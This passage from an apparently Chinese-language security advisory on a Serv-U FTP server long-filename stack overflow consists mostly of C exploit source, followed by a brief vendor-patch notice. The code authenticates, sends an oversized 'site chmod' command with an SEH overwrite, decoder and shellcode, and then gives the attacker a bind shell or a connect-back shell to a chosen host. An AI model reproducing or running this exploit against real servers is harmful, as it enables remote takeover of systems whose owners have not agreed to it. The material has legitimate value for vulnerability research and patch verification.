

📁 Serv-U Ftp服务器长文件名堆栈溢出漏洞
                iType = atoi(argv[i+1]);
                break;
            case 'f':
                iPort=atoi(argv[i+1]);
                break;
            case 'p':
                pPass = argv[i+1];
                break;
            case 'u':
                pUser=argv[i+1];
                break;
            case 'c':
                cbHost=argv[i+1];
                bCb=TRUE;
                break;
            case 's':
                shport=atoi(argv[i+1]);
                break;
            case 'd':
                if(argv[i+1][0] != '/')
                    strcpy(szDirectory, "/");
                strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);
                
                if(szDirectory[strlen(szDirectory)-1] != '/')
                    strcat(szDirectory, "/");
                    
                // correct the directory len
                for(j=0;j<(strlen(szDirectory)-1)%8;j++)
                    strcat(szDirectory, "x");
                    
                //printf("%d:%s\r\n", strlen(szDirectory), szDirectory);
                seh_offset = seh_offset - strlen(szDirectory)+1;
                break;
        }
    }

    if((!ip) || (!user) || (!pass))
    {
        usage(argv[0]);
        printf("[-] Invalid parameter.\n");
        return;
    }

    if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
    {
        usage(argv[0]);
        printf("[-] Invalid type.\n");
        return;
    }

    if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
    {
        usage(argv[0]);
        printf("[-] Invalid port.\n");
        return;
    }
    
    _snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
    user[sizeof(user)-1]='\0';
    _snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
    pass[sizeof(pass)-1]='\0';
    szSend[0] = user;    //user
    szSend[1] = pass;    //pass    
    szSend[2] = penetrate;    //pentrate
    szSend[3] = szCommand;    //shellcode
    
    // Penetrate through the firewall.
    if(bCb && shport > 1024)
    {
        strncpy(cbHost2, cbHost, 20);
        for(i=0;i<strlen(cbHost); i++)
        {
            if(cbHost[i] == '.')
                cbHost2[i] = ',';
        }
        
        sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);

        //printf("%s", penetrate);
    }
    else
    {
        sprintf(penetrate,"TYPE I\r\n");        
    }

    // fill the "site chmod" command
    strcpy(szCommand, "site chmod 777 ");
    
    // fill the directory
    if(szDirectory[0])
        strcat(szCommand, szDirectory);

    // fill the egg
    for(i=0;i<seh_offset%8;i++)
        strcat(szCommand, "\x90");
    //strcat(szCommand, "BBBB");
    
    // fill the seh
    for(i=0;i<=(seh_offset/8)*8+0x20;i+=8)
    {
        strcat(szCommand, JMP_OVER);
        memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
    }
        
    // fill the decode
    strcat(szCommand, decode);

    // fill the shellcode start    sign
    strcat(szCommand, sc_start);

    // fill the shellcode
    if(bCb)
    {
        // connectback shellcode
        shport2 = htons(shport)^(u_short)0x9393;
        cbip = inet_addr(cbHost)^0x93939393;
        memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
        memcpy(&cbsc[IP_OFFSET], &cbip, 4);
        strcat(szCommand, cbsc);        
    }
    else
    {
        // bind shellcode
        shport2 = htons(shport)^(u_short)0x9393;
        memcpy(&sc[BIND_OFFSET], &shport2, 2);
        strcat(szCommand, sc);
    }

    // fill the shellcode end sign
    strcat(szCommand, sc_end);

    // send end
    strcat(szCommand, "\r\n");

    if(strlen(szCommand) >= sizeof(szCommand))
    {
        printf("[-] stack buffer overflow.\n");
        return;
    }
    
//    printf("send size %d:%s", strlen(szCommand), szCommand);
    
    __try
    {
        if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
        {
            printf("[-] WSAStartup error:%d\n", WSAGetLastError());
            __leave;
        }

        s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(s == INVALID_SOCKET)
        {
            printf("[-] Create socket failed:%d",GetLastError());
            __leave;
        }

        sa.sin_family=AF_INET;
        sa.sin_port=htons((USHORT)iPort);
        sa.sin_addr.S_un.S_addr=inet_addr(ip);

        setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
        iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
        if(iErr == SOCKET_ERROR)
        {
            printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
            __leave;
        }
        printf("[+] Connect to %s:%d success.\n", ip, iPort);
        
        if(bCb)
        {
            Sleep(500);
            s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

            server.sin_family=AF_INET;
            server.sin_addr.S_un.S_addr=inet_addr(cbHost);
            //server.sin_addr.s_addr=INADDR_ANY; 
            server.sin_port=htons((unsigned short)shport);

            setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));

            Reuse = 1; 
            setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));

            if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
            {
                printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
                printf("[-] You must run nc get the shell.\n");
                bLocal = FALSE;
                //closesocket(s2);
                //__leave;
            }
            else
            {    
                printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
                listen(s2, 1); 
            }
        }
        
        for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
        {
            memset(szRecvBuff, 0, sizeof(szRecvBuff));
            iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
            if(iErr == SOCKET_ERROR)
            {
                printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
                __leave;
            }
            printf("[+] Recv: %s", szRecvBuff);
            
            if(szRecvBuff[0] == '5')
            {
                printf("[-] Server return a error Message.\r\n");
                __leave;
            }

            iErr = send(s, szSend[i], strlen(szSend[i]),0);
            if(iErr == SOCKET_ERROR)
            {
                printf("[-] Send buffer error:%d.\n", WSAGetLastError());
                __leave;
            }

            if(i==sizeof(szSend)/sizeof(szSend[0])-1)
                printf("[+] Send shellcode %d bytes.\n", iErr);
            else
                printf("[+] Send: %s", szSend[i]);
        }

        printf("[+] If you don't have a shell it didn't work.\n");

        if(bCb)
        {
            if(bLocal)
            {
                printf("[+] Wait for shell...\n");
            
                len = sizeof(client);
                s3 = accept(s2, (struct sockaddr*)&client, &len); 
                if(s3 != INVALID_SOCKET) 
                { 
    printf("[+] Exploit success! Good luck! :)\n");
    printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
                    shell(s3);
                }
            }    
        }
        else
        {
            printf("[+] Connect to shell...\n");
            
            Sleep(1000);
            s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
            server.sin_family = AF_INET;
            server.sin_port = htons(shport);
            server.sin_addr.s_addr=inet_addr(ip);

            ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
            if(ret!=0)
            {
                printf("[-] Exploit seem failed.\n");
                __leave;
            }
            
    printf("[+] Exploit success! Good luck! :)\n");
    printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
            shell(s2);
        }
        
        
    }

    __finally
    {
        if(s != INVALID_SOCKET) closesocket(s);
        if(s2 != INVALID_SOCKET) closesocket(s2);
        if(s3 != INVALID_SOCKET) closesocket(s3);
        WSACleanup();
    }

    return;
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

RhinoSoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载 Serv-U 5.0：

http://www.serv-u.com/
